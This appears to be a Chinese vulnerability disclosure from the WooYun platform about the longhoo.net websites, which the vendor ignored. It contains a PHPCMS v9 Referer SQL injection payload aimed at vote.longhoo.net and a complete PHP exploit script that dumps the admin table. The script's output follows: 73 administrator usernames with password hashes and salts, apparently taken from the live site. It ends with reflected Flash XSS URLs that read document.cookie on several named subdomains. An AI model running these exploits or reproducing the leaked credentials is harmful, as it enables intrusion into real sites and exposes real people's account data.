2016-01-17: 细节已通知厂商并且等待厂商处理中 2016-01-22: 厂商已经主动忽略漏洞,细节向公众公开
……
问题的根本在PHPCMSv9 的Rerferer注入EXP:http://vote.longhoo.net/index.php?m=poster&c=index&a=poster_click&id=1
Referer:vote.longhoo.net',(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#
经过修改后的http head是这样的
Host: vote.longhoo.netUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-aliveCookie: CNZZDATA2919850=cnzz_eid=97895523-1357654308-&ntime=1357654308&cnzz_a=0&retime=1357654307516&sin=<ime=1357654307516&rtime=0Referer:http://vote.longhoo.net’,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#
借用独自等待的EXP
<?php/** * Created by 独自等待 * User: Hack2012 * Date: 13-2-4 下午8:25 * FileName: phpcmsv9_post_v3.php * 独自等待博客www.waitalone.cn */print_r('+------------------------------------------------------+ PHPCMS_V9 poster_click 注入EXP Site:http://www.waitalone.cn/ Exploit BY: 独自等待 Time:2013-02-19+------------------------------------------------------+');if ($argc < 3) { print_r('+------------------------------------------------------+Useage: php ' . $argv[0] . ' host pathHost: target server (ip/hostname)Path: path of phpcmsExample: php ' . $argv[0] . ' localhost /phpcms+------------------------------------------------------+ '); exit;}error_reporting(7);//统计时间$start_time = func_time();$host = $argv[1];$path = $argv[2];//取得管理员个数$cmd1 = "Referer: ' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,count(*),0x23) FROM v9_admin)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1";//echo send_pack($cmd1);if (preg_match('/MySQL Query/', send_pack($cmd1))) { //取得管理员表前缀 preg_match('/\.`(.*?)_poster/', send_pack($cmd1), $prefix_match); $tableadmin = $prefix_match[1] . '_admin'; //取得管理员个数 $cmd2 = "Referer: ' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,count(*),0x23) FROM $tableadmin)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1"; preg_match('/\'#(\d+)#1/U', send_pack($cmd2), $num_match); $count = $num_match[1]; echo '共有' . $count . '个管理员' . "\n"; //取得管理员用户名及数据 if (preg_match('/Duplicate/', send_pack($cmd2))) { foreach (range(0, ($count - 1)) as $i) { $payload = "Referer: ' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,username,0x3a,password,0x3a,encrypt,0x23) FROM $tableadmin Order by userid LIMIT $i,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1"; preg_match('/\'#(.*)#1/U', send_pack($payload), $admin_match); if (preg_match('/charset=utf-8/', send_pack($payload))) { echo $i . '-->' . iconv('utf-8', 'gbk//IGNORE', $admin_match[1]) . "\n"; } else { echo $i . '-->' . $admin_match[1] . "\n"; } //echo $admin_match[1]. "\n"; //echo iconv('utf-8', 'gbk//IGNORE', $admin_match[1]) . "\n"; //echo mb_convert_encoding($admin_match[1],'gbk','auto')."\n"; } }} else { exit("报告大人,网站不存在此漏洞,你可以继续秒下一个!\n");}//提交数据包函数function send_pack($cmd){ global $host, $path; $data = "GET " . $path . "/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=1 HTTP/1.1\r\n"; $data .= "Host: " . $host . "\r\n"; $data .= "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0\r\n"; $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"; $data .= $cmd . "\r\n"; $data .= "Accept-Language: zh-cn\r\n"; $data .= "Connection: Close\r\n\r\n"; //这里一定要2个\r\n否则将会一直等待并且不返回数据 $fp = @fsockopen($host, 80, $errno, $errstr, 30); //echo ini_get('default_socket_timeout');//默认超时时间为60秒 if (!$fp) { echo $errno . '-->' . $errstr; exit('Could not connect to: ' . $host); } else { fwrite($fp, $data); $back = ''; while (!feof($fp)) { $back .= fread($fp, 1024); } fclose($fp); } return $back;}//时间统计函数function func_time(){ list($microsec, $sec) = explode(' ', microtime()); return $microsec + $sec;}echo '脚本执行时间:' . round((func_time() - $start_time), 4) . '秒。';?>
0-->mracale:0840a12ed1161a79cfd7b4b17662bf2c:AAWFSX1-->chengang:76d79998b544466576c20c57eca10486:Fyy1Ld2-->zoujiachen:e6ec2a15a109fbb95c702ed4a035bbce:BUXrgv3-->grk:b0108b640b1dc29d746bcd81a4575f4a:UKTVlF4-->zxl:4a07f0c4444febc10898f1b4aa773761:jhA7wb5-->jh:7026f05b81a01e97973ec0fc9c2de530:nM91JM6-->yuanzong:dc2725f6d79e8e5c777a945e39a9a9d1:AWu4Tt7-->zy:2be20978700ccf0918f15dda521bec03:xLaTcB8-->wy:73c59ce21de8f5673ea5e1a61d7bf3e4:If3lwL9-->hongli:3359bbb23b10fe3c3ed9de77e0199d28:zbY3dg10-->xueshan:e8f3c711cc4d319573cef3c6c8c441fd:AvXHZa11-->hl:8ca34a75aaa599b8d7a5cbdd9d1a06c5:bLP1Qv12-->��ϼ������:907be2ae09e1ecc6221e0265d57c0741:a9YeCF13-->�ܽ�:8378a8a3181e43cde0ffd0cfcb72e600:92E7bt14-->wangqianhong:95854cea8dc2d072049b05e0289814d2:ajw7zY15-->qdh:b205d0afe6ae3f2f6b26204d163fc2ee:Z2gHlP16-->Ѱ��ˮ�����:e6d2ce17555d4d266af8a8beff0f8fb0:RW5U6G6G17-->������:631485a0169818065dea0479bf54c65c:PJUQpV18-->�ź�:f7265b219b19e4963fa73457b8446c69:rA2iCe19-->������:f4eecf7d1df6ecd286af521792712247:ZbEWQP20-->hangcheng:7b0524fcc8d940bb42b506bd5e5ea533:9Yy5YZ21-->liuyanan:76b62249e280caacdede92843408f539:EDzgfd22-->lizhen:a5f42a630bec5eef3b9f35d00dba861a:bBuNf223-->��ٻ:8c955d13f969cbd36b9a6efaa1cb6999:71J5wY24-->guorenke:259daa89dc857816c6ccba53fc40d53d:9lMM2r25-->wangqianhong2:ca65b191e027bf51a4fe90504a5d8f66:Wp8sdM26-->liyuqin:5e63e4551800d72ef2dc05e3b4fa233d:njxKt627-->zhouxian:5c8f654fab2a33da28fe5e466eeaa0a8:MgiJbq28-->gengtingting:f718ca19593e89f00449fb311f33a772:WwgzWc29-->��ٻ:4dd7352172130336c6bfa1d28fabc0d4:yMS9EW30-->�³�:04832a8c57fc833eecb97e8da0d3b3a2:NFfQ7431-->syj:b4cb5b1d4974121cdfccc7e79548aea7:CvmkLd32-->qianduan:2bdeba10452c14ef4290a2876839930d:pmlpg833-->zhaiyue:11a53bf3e9baaed25f4a52e7e9fcc6fd:lbiuRm34-->liangqiong:b626b228d8ebaf9c0bb70bbe841f9d4f:sqIfjt35-->zhuting:570ed3667e6922e73f21f67468a1c509:YFQQMW36-->zhangzhao:1bf931be0baac03ae7c69805a5c0b703:5wIlIM37-->zhuxinhui:773435a8df5582a833d0e4ad37ecfd31:KM2Ua138-->zhuanglingyan:51a63b6c29c004f83cf432c88c23139b:B33lpe39-->qianmengmeng:12bad6946f23aa9e848e52b13b2d6820:snxMEj40-->guzhiming:ee39f1ae2f0094ba4d0a370c4562edf1:UY3fks41-->suntingting:0b4748c6618c4a2e2216624bdd45fe20:4girVD42-->gaofei:8fce79e84c3bb0551e649e6b8e8d8904:1qbzqF43-->yufan:04b6ef433d9120eace216a0b6da267ea:4k4fDt44-->sunyi:4523d2a8542a7e9149ec6bf321ea7c13:qAyjs145-->xushan:fb8f02d39fd89accb1fac4b10b45545e:1HCdsl46-->chenwenhui:2e7014feae096afcc19e16ea8406c969:CALG1Q47-->taoyuge:c296bb6e4ad7fb1fd0395e8993a18aaa:A5FK2g48-->zhangxu:5fd42c0ca21ea1cda71203ad9932a9d8:GYkqhc49-->huanghui:320e48fd925c472678e95b57f5c9554b:nJ3ChN50-->libailiang:7e686c8a7c7ef077b5473cdd0cfa9c47:wRj2zG51-->zhangling:82aa0a317c9f382ecfe920a839234e46:Qc4EZz52-->liujiajia:ab6a325e51cb59020164e10e46fd7081:8WVSbS53-->dingjie:be79dd3f20a128f3f5e7a212c38a5f0e:KnLeA854-->yanling:13151fdb2fd283c60dfabdf42024a1b9:pEaEll55-->liujing:ff370dad5022686973c9b27f249638c5:KJpKcA56-->jiangchuan:cdff938f19de3ebe03d0db03a9b2918e:5Ndh9x57-->chenjiahui:916032fc35f84cfa5fa080c582c91524:dh4Hh658-->shangyan:2a571065b95ba69a43b4ee43f800afd2:9vHRkb59-->gaojie:829d3ade3b07d03b7d030a636c75d29f:MkhXcJ60-->sunxiaopei:9a9d68db67cb1a637bb3bba91ef01257:JesIwv61-->������:dad56073d666ec15b5e3d9353a0c8af7:yjvxsW62-->huangjianchun:e86a245de0a3c7e51db46a2f831648ea:w41LcU63-->nieziyi:e3d3fdb2e86ba6366042cc7dc197d124:uqXNy864-->sunlu:8a0abb7b87832bc4f45abce6122af417:BZK6dv65-->test1:d267c4bd5c72df175c57a6c5204d6f92:mzuHyC66-->��ܲ:a92cef551a1ed5d5e20b2ca9e19822d0:jV3l4Y67-->��ѩ��:56dad8f550271633cc33ec928cd52074:Zaa4wx68-->nirui:cd373a403372eb31bf474b2b71fc07de:3k3Szx69-->dongshu:462844e7f2b18476e4e4b144013bf2e7:6TXAAw70-->wk:54b72acff0c1fe504e64c1049feab6fb:BVXnFL71-->�쾧��:45161cd990852f55848e95efb4eef079:pPQI7NN72-->��Ե:409e9747ee8f710df9943fd71149e9db:zlrl3T
最后补充几个反射型XSS:
http://art.longhoo.net/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss
http://cm.longhoo.net/statics/js/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss
http://house.longhoo.net/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss
http://news.longhoo.net/statics/js/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss
http://pinglun.longhoo.net/statics/js/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss
http://test.longhoo.net/statics/js/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss
http://vote.longhoo.net/statics/js/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss
http://zhaopin.longhoo.net/statics/js/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss
http://zt.longhoo.net/statics/js/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss
如上
升级~
危害等级:无影响厂商忽略
忽略时间:2016-01-22 12:40
漏洞Rank:4 (WooYun评价)
暂无
